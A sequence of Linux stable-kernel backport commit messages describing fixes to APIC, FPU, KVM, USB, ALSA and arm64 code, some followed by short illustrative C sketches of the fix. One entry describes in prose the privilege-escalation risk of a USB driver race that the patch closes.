Cc: Borislav Petkov <bp@suse.de>
Cc: Andi Kleen <ak@linux.intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Juergen Gross <jgross@suse.com>
Cc: dyoung@redhat.com
Cc: Eric Biederman <ebiederm@xmission.com>
Cc: kexec@lists.infradead.org
Link: http://lkml.kernel.org/r/1475514432-27682-1-git-send-email-prarit@redhat.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cff9ab2b29 upstream.
The array has a size of MAX_LOCAL_APIC, which can be as large as 32k, so it
can consume up to 128k.
The array has been there forever and was never used for anything useful
other than a version mismatch check which was introduced in 2009.
There is no reason to store the version in an array. The kernel is not
prepared to handle different APIC versions anyway, so the real important
part is to detect a version mismatch and warn about it, which can be done
with a single variable as well.
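A hedged sketch of what the single-variable check can look like; the variable
and function names are illustrative, not quoted from the patch:
static u8 boot_cpu_apic_version;

static void check_apic_version(int cpu, u8 version)
{
	/* Remember the first version seen, warn on any later mismatch. */
	if (!boot_cpu_apic_version)
		boot_cpu_apic_version = version;
	else if (boot_cpu_apic_version != version)
		pr_warn("CPU %d APIC version %#x differs from boot CPU's %#x\n",
			cpu, version, boot_cpu_apic_version);
}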
[ tglx: Massaged changelog ]
Signed-off-by: Denys Vlasenko <dvlasenk@redhat.com>
CC: Andy Lutomirski <luto@amacapital.net>
CC: Borislav Petkov <bp@alien8.de>
CC: Brian Gerst <brgerst@gmail.com>
CC: Mike Travis <travis@sgi.com>
Link: http://lkml.kernel.org/r/20160913181232.30815-1-dvlasenk@redhat.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d4b05923f5 upstream.
Our XSAVE features are divided into two categories: those that
generate FPU exceptions, and those that do not. MPX and pkeys do
not generate FPU exceptions and thus can not be used lazily. We
disable them when lazy mode is forced on.
We have a pair of masks to collect these two sets of features, but
XFEATURE_MASK_PKRU was added to the wrong mask: XFEATURE_MASK_LAZY.
Fix it by moving the feature to XFEATURE_MASK_EAGER.
Note: this only causes a problem if you boot with lazy FPU mode
(eagerfpu=off) which is *not* the default. It also only affects
hardware which is not currently publicly available. It looks like
eager mode is going away, but we still need this patch applied
to any kernel that has protection keys and lazy mode, which is 4.6
through 4.8 at this point, and 4.9 if the lazy removal isn't sent
to Linus for 4.9.
Fixes: c8df400984 ("x86/fpu, x86/mm/pkeys: Add PKRU xsave fields and data structures")
Signed-off-by: Dave Hansen <dave.hansen@intel.com>
Cc: Dave Hansen <dave@sr71.net>
Link: http://lkml.kernel.org/r/20161007162342.28A49813@viggo.jf.intel.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit db91aa793f upstream.
When a CPU is about to be offlined we call fixup_irqs() that resets IRQ
affinities related to the CPU in question. The same thing is also done when
the system is suspended to S-states like S3 (mem).
For each IRQ we try to complete any on-going move regardless of whether the
IRQ is actually part of x86_vector_domain. For each IRQ descriptor we fetch
its chip_data, assume it is of type struct apic_chip_data and manipulate it
by clearing the old_domain mask etc. irq_chips that are not part of the
x86_vector_domain, like those created by various GPIO drivers, will find
their chip_data being changed unexpectedly.
Below is an example where GPIO chip owned by pinctrl-sunrisepoint.c gets
corrupted after resume:
# cat /sys/kernel/debug/gpio
gpiochip0: GPIOs 360-511, parent: platform/INT344B:00, INT344B:00:
gpio-511 ( |sysfs ) in hi
# rtcwake -s10 -mmem
<10 seconds passes>
# cat /sys/kernel/debug/gpio
gpiochip0: GPIOs 360-511, parent: platform/INT344B:00, INT344B:00:
gpio-511 ( |sysfs ) in ?
Note '?' in the output. It means the struct gpio_chip ->get function is
NULL whereas before suspend it was there.
Fix this by first checking that the IRQ belongs to x86_vector_domain before
we try to use the chip_data as struct apic_chip_data.
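A hedged sketch of the guard; the exact field accesses in the patch may differ,
the point is simply to test the domain before the cast:
/* Only IRQs in x86_vector_domain carry struct apic_chip_data. */
if (irqd->domain != x86_vector_domain)
	continue;   /* leave foreign irq_chips and their chip_data alone */
data = (struct apic_chip_data *)irqd->chip_data;   /* now safe to use */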
Reported-and-tested-by: Sakari Ailus <sakari.ailus@linux.intel.com>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Link: http://lkml.kernel.org/r/20161003101708.34795-1-mika.westerberg@linux.intel.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b5e7307d9d upstream.
In some places, dump_backtrace() is called with a NULL tsk parameter,
e.g. in bug_handler() in arch/arm64, or indirectly via show_stack() in
core code. The expectation is that this is treated as if current were
passed instead of NULL. Similar is true of unwind_frame().
Commit a80a0eb70c ("arm64: make irq_stack_ptr more robust") didn't
take this into account. In dump_backtrace() it compares tsk against
current *before* we check if tsk is NULL, and in unwind_frame() we never
set tsk if it is NULL.
Due to this, we won't initialise irq_stack_ptr in either function. In
dump_backtrace() this results in calling dump_mem() for memory
immediately above the IRQ stack range, rather than for the relevant
range on the task stack. In unwind_frame we'll reject unwinding frames
on the IRQ stack.
In either case this results in incomplete or misleading backtrace
information, but is not otherwise problematic. The initial percpu areas
(including the IRQ stacks) are allocated in the linear map, and dump_mem
uses __get_user(), so we shouldn't access anything with side-effects,
and will handle holes safely.
This patch fixes the issue by having both functions handle the NULL tsk
case before doing anything else with tsk.
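The shape of the fix is simple; a hedged sketch, not the verbatim arm64 diff:
void dump_backtrace(struct pt_regs *regs, struct task_struct *tsk)
{
	/* Treat a NULL task as "current" before tsk is used anywhere, so
	 * the later tsk == current comparison picks the right stacks. */
	if (!tsk)
		tsk = current;

	/* ... walk the frames as before ... */
}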
Signed-off-by: Mark Rutland <mark.rutland@arm.com>
Fixes: a80a0eb70c ("arm64: make irq_stack_ptr more robust")
Acked-by: James Morse <james.morse@arm.com>
Cc: Catalin Marinas <catalin.marinas@arm.com>
Cc: Will Deacon <will.deacon@arm.com>
Cc: Yang Shi <yang.shi@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ac0e89bb47 upstream.
We use logical negate where bitwise negate was intended. It means that
we never return -EINVAL here.
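The difference is easy to demonstrate in isolation; the flag values below are
made up for the example:
#include <stdio.h>

int main(void)
{
	unsigned int flags = 0x6;          /* made-up control word */
	unsigned int valid_mask = 0x3;     /* made-up set of valid bits */

	/* Logical negate: !valid_mask is 0, so this never rejects anything. */
	if (flags & !valid_mask)
		printf("never reached\n");

	/* Bitwise negate: rejects any bit outside the valid set. */
	if (flags & ~valid_mask)
		printf("invalid bits set, would return -EINVAL\n");
	return 0;
}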
Fixes: ce11e48b7f ('KVM: PPC: E500: Add userspace debug stub support')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Alexander Graf <agraf@suse.de>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0099b7701f upstream.
If the vgic hasn't been created and initialized, we shouldn't attempt to
look at its data structures or flush/sync anything to the GIC hardware.
This fixes an issue reported by Alexander Graf when using a userspace
irqchip.
Fixes: 0919e84c0f ("KVM: arm/arm64: vgic-new: Add IRQ sync/flush framework")
Reported-by: Alexander Graf <agraf@suse.de>
Acked-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6fe407f2d1 upstream.
If userspace creates a PMU for the VCPU, but doesn't create an in-kernel
irqchip, then we end up in a nasty path where we try to take an
uninitialized spinlock, which can lead to all sorts of breakages.
Luckily, QEMU always creates the VGIC before the PMU, so we can
establish this as ABI and check for the VGIC in the PMU init stage.
This can be relaxed at a later time if we want to support PMU with a
userspace irqchip.
Cc: Shannon Zhao <shannon.zhao@linaro.org>
Acked-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 91e4f1b607 upstream.
When a guest TLB entry is replaced by TLBWI or TLBWR, we only invalidate
TLB entries on the local CPU. This doesn't work correctly on an SMP host
when the guest is migrated to a different physical CPU, as it could pick
up stale TLB mappings from the last time the vCPU ran on that physical
CPU.
Therefore invalidate both user and kernel host ASIDs on other CPUs,
which will cause new ASIDs to be generated when it next runs on those
CPUs.
We're careful only to do this if the TLB entry was already valid, and
only for the kernel ASID where the virtual address it mapped is outside
of the guest user address range.
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fa73c3b25b upstream.
The MMCR2 register is available twice, once with number 785
(privileged access), and once with number 769 (unprivileged,
but it can be disabled completely). In former times, the Linux
kernel used only the unprivileged register 769, but since
commit 8dd75ccb57 ("powerpc: Use privileged SPR number
for MMCR2"), it uses the privileged register 785 instead.
The KVM-PR code then of course also switched to use the SPR 785,
but this is causing older guest kernels to crash, since these
kernels still access 769 instead. So to support older kernels
with KVM-PR again, we have to support register 769 in KVM-PR, too.
Fixes: 8dd75ccb57
Signed-off-by: Thomas Huth <thuth@redhat.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6a198bc60 upstream.
Early during boot topology_update_package_map() computes
logical_pkg_ids for all present processors.
Later, when processors are brought up, identify_cpu() updates
these values based on phys_pkg_id which is a function of
initial_apicid. On PV guests the latter may point to a
non-existing node, causing logical_pkg_ids to be set to -1.
Intel's RAPL uses logical_pkg_id (as topology_logical_package_id())
to index its arrays and therefore in this case will point to index
65535 (since logical_pkg_id is a u16). This could lead either to a
crash or to an access to a random memory location.
As a workaround, we recompute topology during CPU bringup to reset
logical_pkg_id to a valid value.
(The reason for initial_apicid being bogus is because it is
initial_apicid of the processor from which the guest is launched.
This value is CPUID(1).EBX[31:24])
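The 65535 mentioned above is simply -1 truncated to 16 bits:
#include <stdio.h>
#include <stdint.h>

int main(void)
{
	int logical_pkg_id = -1;                  /* "no package" sentinel */
	uint16_t index = (uint16_t)logical_pkg_id;

	/* -1 stored in a u16 becomes 65535, far outside any valid array. */
	printf("%u\n", (unsigned int)index);      /* prints 65535 */
	return 0;
}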
Signed-off-by: Boris Ostrovsky <boris.ostrovsky@oracle.com>
Signed-off-by: David Vrabel <david.vrabel@citrix.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 88003fb10f upstream.
This fixes a compile failure:
drivers/built-in.o: In function `wm8350_i2c_probe':
core.c:(.text+0x828b0): undefined reference to `__devm_regmap_init_i2c'
Makefile:953: recipe for target 'vmlinux' failed
Fixes: 52b461b86a ("mfd: Add regmap cache support for wm8350")
Signed-off-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Acked-by: Charles Keepax <ckeepax@opensource.wolfsonmicro.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a6dc64451 upstream.
set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug. It's done
consistently so it won't cause a problem unless "irq" is more than 4.
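A minimal illustration of the double shift; the irq value is arbitrary:
#include <stdio.h>

int main(void)
{
	unsigned int irq = 3;

	/* set_bit()/clear_bit() already take a bit *number*, so passing
	 * (1 << irq) ends up touching bit 8 instead of bit 3. */
	printf("%#x\n", 1u << (1u << irq));  /* buggy mask:   0x100 */
	printf("%#x\n", 1u << irq);          /* intended bit: 0x8 */
	return 0;
}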
Fixes: 70c6cce040 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2c2469bc03 upstream.
readl_poll_timeout() calls usleep_range(), but
regmap_atmel_hlcdc_reg_write() is called in atomic context (regmap
spinlock held).
Replace the readl_poll_timeout() call by readl_poll_timeout_atomic().
Fixes: ea31c0cf9b ("mfd: atmel-hlcdc: Implement config synchronization")
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8dcc5ff8fc upstream.
Member "status" of struct usb_sg_request is managed by usb core. A
spin lock is used to serialize the change of it. The driver could
check the value of req->status, but should avoid changing it without
the hold of the spinlock. Otherwise, it could cause race or error
in usb core.
This patch could be backported to stable kernels with version later
than v3.14.
Cc: Alan Stern <stern@rowland.harvard.edu>
Cc: Roger Tseng <rogerable@realtek.com>
Signed-off-by: Lu Baolu <baolu.lu@linux.intel.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8da08ca03b upstream.
Currently, the usb-line6 module exports an array of MIDI manufacturer ID bytes
and the usb-pod module uses it. However, the declaration in the common header
does not match the definition; the difference is the explicit length of the
array. Although the compiler calculates it and everything goes well, it's
better to use the same representation for the definition and the declaration.
This commit fills in the length of the array for the usb-line6 module. As a
small side benefit, it also suppresses the warnings below from static analysis
by sparse v0.5.0.
sound/usb/line6/driver.c:274:43: error: cannot size expression
sound/usb/line6/driver.c:275:16: error: cannot size expression
sound/usb/line6/driver.c:276:16: error: cannot size expression
sound/usb/line6/driver.c:277:16: error: cannot size expression
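A hedged sketch of the declaration/definition pairing the commit is about; the
identifier, length and byte values here are placeholders, not the driver's
actual manufacturer ID:
/* common header: declaration now spells out the length explicitly */
extern const unsigned char line6_midi_id[3];

/* driver.c: definition uses the same representation */
const unsigned char line6_midi_id[3] = { 0x00, 0x01, 0x02 };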
Fixes: 705ececd1c ("Staging: add line6 usb driver")
Signed-off-by: Takashi Sakamoto <o-takashi@sakamocchi.jp>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit eb1a74b7be upstream.
The DragonFly quirk added in 42e3121d90 ("ALSA: usb-audio: Add a more
accurate volume quirk for AudioQuest DragonFly") applies a custom dB map
on the volume control when its range is reported as 0..50 (0 .. 0.2dB).
However, there exists at least one other variant (hw v1.0c, as opposed
to the tested v1.2) which reports a different nonsensical volume range
(0..53), so the custom map is not applied for that device.
This results in all of the volume changes appearing close to 100% on
mixer UIs that utilize the dB TLV information.
Add a fallback case where no dB TLV is reported at all if the control
range is not 0..50 but still 0..N where N <= 1000 (3.9 dB). Also
restrict the quirk to only apply to the volume control as there is also
a mute control which would match the check otherwise.
Fixes: 42e3121d90 ("ALSA: usb-audio: Add a more accurate volume quirk for AudioQuest DragonFly")
Signed-off-by: Anssi Hannula <anssi.hannula@iki.fi>
Reported-by: David W <regulars@d-dub.org.uk>
Tested-by: David W <regulars@d-dub.org.uk>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit db68577966 upstream.
The pointer callbacks of the ali5451 driver may occasionally return the value
at the boundary, which results in a kernel warning like:
snd_ali5451 0000:00:06.0: BUG: , pos = 16384, buffer size = 16384, period size = 1024
It seems that folding the position offset is enough to fix the
warning, and no ill effect has been observed from doing so.
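A hedged sketch of what "folding" the position means here (not the driver's
exact code):
/* A reported position equal to the buffer size is the same ring position
 * as 0; fold it back into [0, buffer_size) before handing it to ALSA. */
if (pos >= runtime->buffer_size)
	pos -= runtime->buffer_size;
return pos;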
Reported-by: Enrico Mioso <mrkiko.rs@gmail.com>
Tested-by: Enrico Mioso <mrkiko.rs@gmail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 919ab2524c upstream.
The musb driver calls into this phy driver to disable/enable squelch
detection. This function was introduced in 24fe86a617 ("phy: sun4i-usb:
Add a sunxi specific function for setting squelch-detect"). This
function in turn calls sun4i_usb_phy_write, which uses a mutex to
guard access to the common register. Unfortunately, musb does this
in atomic context, which results in the following warning with lock
debugging enabled:
BUG: sleeping function called from invalid context at kernel/locking/mutex.c:97
in_atomic(): 1, irqs_disabled(): 128, pid: 96, name: kworker/0:2
CPU: 0 PID: 96 Comm: kworker/0:2 Not tainted 4.8.0-rc4-00181-gd502f8ad1c3e #13
Hardware name: Allwinner sun8i Family
Workqueue: events musb_deassert_reset
[<c010bc01>] (unwind_backtrace) from [<c0109237>] (show_stack+0xb/0xc)
[<c0109237>] (show_stack) from [<c02a669b>] (dump_stack+0x67/0x74)
[<c02a669b>] (dump_stack) from [<c05d68c9>] (mutex_lock+0x15/0x2c)
[<c05d68c9>] (mutex_lock) from [<c02c3589>] (sun4i_usb_phy_write+0x39/0xec)
[<c02c3589>] (sun4i_usb_phy_write) from [<c03e6327>] (musb_port_reset+0xfb/0x184)
[<c03e6327>] (musb_port_reset) from [<c03e4917>] (musb_deassert_reset+0x1f/0x2c)
[<c03e4917>] (musb_deassert_reset) from [<c012ecb5>] (process_one_work+0x129/0x2b8)
[<c012ecb5>] (process_one_work) from [<c012f5e3>] (worker_thread+0xf3/0x424)
[<c012f5e3>] (worker_thread) from [<c0132dbd>] (kthread+0xa1/0xb8)
[<c0132dbd>] (kthread) from [<c0105f31>] (ret_from_fork+0x11/0x20)
Since the register access is mmio, we can use a spinlock to guard this
specific access, rather than the mutex that guards the entire phy.
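A hedged sketch of the general pattern, guarding a single MMIO register with a
spinlock that is safe to take from atomic context; the names are illustrative,
not the driver's:
#include <linux/spinlock.h>
#include <linux/io.h>

static DEFINE_SPINLOCK(phy_ctl_lock);

static void phy_ctl_update(void __iomem *reg, u32 mask, u32 val)
{
	unsigned long flags;

	/* Unlike mutex_lock(), this may be called from atomic context. */
	spin_lock_irqsave(&phy_ctl_lock, flags);
	writel((readl(reg) & ~mask) | val, reg);
	spin_unlock_irqrestore(&phy_ctl_lock, flags);
}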
Fixes: ba4bdc9e1d ("PHY: sunxi: Add driver for sunxi usb phy")
Cc: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Reviewed-by: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Kishon Vijay Abraham I <kishon@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e6c88d28c upstream.
Commit 50c763f8c1 ("usb: dwc3: Set the ClearPendIN bit on Clear
Stall EP command") sets the ClearPendIN bit for all IN endpoints of
v2.60a+ cores. This causes the Clear Stall command to fail on 2.60a+
cores operating in HighSpeed mode.
On page 539 of the 2.60a specification:
"When issuing Clear Stall command for IN endpoints in SuperSpeed
mode, the software must set the "ClearPendIN" bit to '1' to
clear any pending IN transactions, so that the device does not
expect any ACK TP from the host for the data sent earlier."
It's obvious that we only need to apply this rule to those IN
endpoints that are currently operating in SuperSpeed mode.
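A hedged sketch of the resulting condition; the field and macro names follow
the dwc3 style but are assumptions here, not quotes from the driver:
/* Only SuperSpeed IN endpoints need ClearPendIN on v2.60a+ cores. */
if (dep->direction && dwc->revision >= DWC3_REVISION_260A &&
    dwc->gadget.speed >= USB_SPEED_SUPER)
	cmd |= DWC3_DEPCMD_CLEARPENDIN;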
Fixes: 50c763f8c1 ("usb: dwc3: Set the ClearPendIN bit on Clear Stall EP command")
Signed-off-by: Lu Baolu <baolu.lu@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a094760b9a upstream.
Since commit 71723f9546 "PM / runtime: print error when activating a
child to unactive parent" I see the following error message:
scsi host2: usb-storage 1-3:1.0
scsi host2: runtime PM trying to activate child device host2 but parent
(1-3:1.0) is not active
Digging into it, it seems to be related to the problem described in the
commit message for cd998ded5c "i2c: designware: Prevent runtime
suspend during adapter registration" as scsi_add_host also calls
device_add and after the call to device_add the parent device is
suspended.
Fix this by using the approach from the mentioned commit and getting
the runtime pm reference before calling scsi_add_host.
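A hedged sketch of one way to hold the reference across registration (the
variable names are assumptions, and this is not the verbatim usb-storage diff):
/* Keep the parent interface active while scsi_add_host() runs, since
 * device_add() may otherwise leave it runtime suspended. */
pm_runtime_get_sync(&intf->dev);
err = scsi_add_host(host, &intf->dev);
pm_runtime_put(&intf->dev);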
Signed-off-by: Heiner Kallweit <hkallweit1@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0eec880966 upstream.
HP Spectre x360 with CX20724 codec has two speaker outputs while the
BIOS sets up only the bottom one (NID 0x17) and disables the top one
(NID 0x1d).
This patch adds a fixup simply defining the proper pincfg for NID 0x1d
so that the top speaker works as is.
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=169071
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3f640970a4 upstream.
One of the laptops has the ALC256 codec on it; applying
ALC255_FIXUP_DELL1_MIC_NO_PRESENCE fixes the problem. The rest
of the laptops have the ALC295 codec; they are similar to machines
with ALC225, and applying ALC269_FIXUP_DELL1_MIC_NO_PRESENCE fixes
the problem.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 392c9da24a upstream.
We have two new Dell laptop models; they share the same ALC255 pin
definition, but it is not in the pin quirk table yet, so the
headset microphone can't work. After adding the definition to the
table, the headset microphone works well.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ab21b63e8a upstream.
This reverts commit e6c7efdcb7.
Turns out it was totally wrong. The memory is supposed to be bound to
the kref, as the original code was doing correctly, not the
device/driver binding as the devm_kzalloc() would cause.
This fixes an oops when read would be called after the device was
unbound from the driver.
Reported-by: Ladislav Michl <ladis@linux-mips.org>
Cc: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 238b7bd91b upstream.
In v_recv_cmd_submit(), urb_p->urb->pipe has the type unsigned int
(which is 32 bits wide on x86_64), but 11<<30 results in a 34-bit integer.
Therefore the 2 leading bits are truncated and
urb_p->urb->pipe &= ~(11 << 30);
has the same meaning as
urb_p->urb->pipe &= ~(3 << 30);
This second statement seems to be how the code was intended to be
written, as PIPE_ constants have values between 0 and 3.
The overflow has been detected with a clang warning:
drivers/usb/usbip/vudc_rx.c:145:27: warning: signed shift result
(0x2C0000000) requires 35 bits to represent, but 'int' only has 32
bits [-Wshift-overflow]
urb_p->urb->pipe &= ~(11 << 30);
~~ ^ ~~
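The truncation is easy to reproduce outside the driver:
#include <stdio.h>

int main(void)
{
	unsigned int pipe = 0xffffffffu;

	/* 11 << 30 is 0x2C0000000 and does not fit in 32 bits; after
	 * truncation, ~(11u << 30) clears exactly the same two bits
	 * as the intended ~(3u << 30). */
	printf("%#x\n", pipe & ~(11u << 30));  /* 0x3fffffff */
	printf("%#x\n", pipe & ~(3u << 30));   /* 0x3fffffff */
	return 0;
}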
Fixes: 79c02cb1fd ("usbip: vudc: Add vudc_rx")
Signed-off-by: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fc1e2c8ea8 upstream.
Commit 367e8560e8 introduced a bug
in fbtft-core where fps is always 0, because the variable
update_time is not assigned correctly.
Signed-off-by: Ksenija Stanojevic <ksenija.stanojevic@gmail.com>
Fixes: 367e8560e8 ("Staging: fbtbt: Replace timespec with ktime_t")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2fae9e5a7b upstream.
This patch fixes a NULL pointer dereference caused by a race condition in
the probe function of the legousbtower driver. It restructures the
probe function to only register the interface after successfully reading
the board's firmware ID.
The probe function does not deregister the usb interface after an error
receiving the device's firmware ID. The device file registered
(/dev/usb/legousbtower%d) may be read/written globally before the probe
function returns. When tower_delete is called in the probe function
(after an r/w has been initiated), core dev structures are deleted while
the file operation functions are still running. If the 0 address is
mappable on the machine, this vulnerability can be used to create a
Local Privilege Escalation exploit via a write-what-where condition by
remapping dev->interrupt_out_buffer in tower_write. A forged USB device
and local program execution would be required for LPE. The USB device
would have to delay the control message in tower_probe and accept
the control urb in tower_open while guest code initiated a write to the
device file, as tower_delete is called from the error path in tower_probe.
This bug has existed since 2003. The patch was tested with an emulated device.
Reported-by: James Patrick-Evans <james@jmp-e.com>
Tested-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 21f54ddae4 upstream.
That just generally kills the machine, and makes debugging only much
harder, since the traces may long be gone.
Debugging by assert() is a disease. Don't do it. If you can continue,
you're much better off doing so with a live machine where you have a
much higher chance that the report actually makes it to the system logs,
rather than result in a machine that is just completely dead.
The only valid situation for BUG_ON() is when continuing is not an
option, because there is massive corruption. But if you are just
verifying that something is true, you warn about your broken assumptions
(preferably just once), and limp on.
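In code, the guidance boils down to something like the following; the function
and type names are made up for illustration:
static void check_shadow_node(struct radix_tree_node *node)
{
	/* Report the broken assumption once and limp on... */
	if (WARN_ON_ONCE(!node))
		return;

	/* ...instead of BUG_ON(!node), which takes the whole machine down. */
}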
Fixes: 22f2ac51b6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()")
Cc: Johannes Weiner <hannes@cmpxchg.org>
Cc: Miklos Szeredi <miklos@szeredi.hu>
Cc: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3a402a7095 upstream.
When TIF_SINGLESTEP is set for a task, the single-step state machine is
enabled and we must take care not to reset it to the active-not-pending
state if it is already in the active-pending state.
Unfortunately, that's exactly what user_enable_single_step does, by
unconditionally setting the SS bit in the SPSR for the current task.
This causes failures in the GDB testsuite, where GDB ends up missing
expected step traps if the instruction being stepped generates another
trap, e.g. PTRACE_EVENT_FORK from an SVC instruction.
This patch fixes the problem by preserving the current state of the
stepping state machine when TIF_SINGLESTEP is set on the current thread.
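A hedged sketch of the idea (not necessarily the verbatim arm64 patch): only
arm the SPSR single-step bit when the thread flag was not already set, so an
active-pending state machine is left alone:
void user_enable_single_step(struct task_struct *task)
{
	struct thread_info *ti = task_thread_info(task);

	/* If TIF_SINGLESTEP was already set, the state machine may be
	 * active-pending; do not knock it back to active-not-pending. */
	if (!test_and_set_ti_thread_flag(ti, TIF_SINGLESTEP))
		set_regs_spsr_ss(task_pt_regs(task));
}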
Cc: <stable@vger.kernel.org>
Reported-by: Yao Qi <yao.qi@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>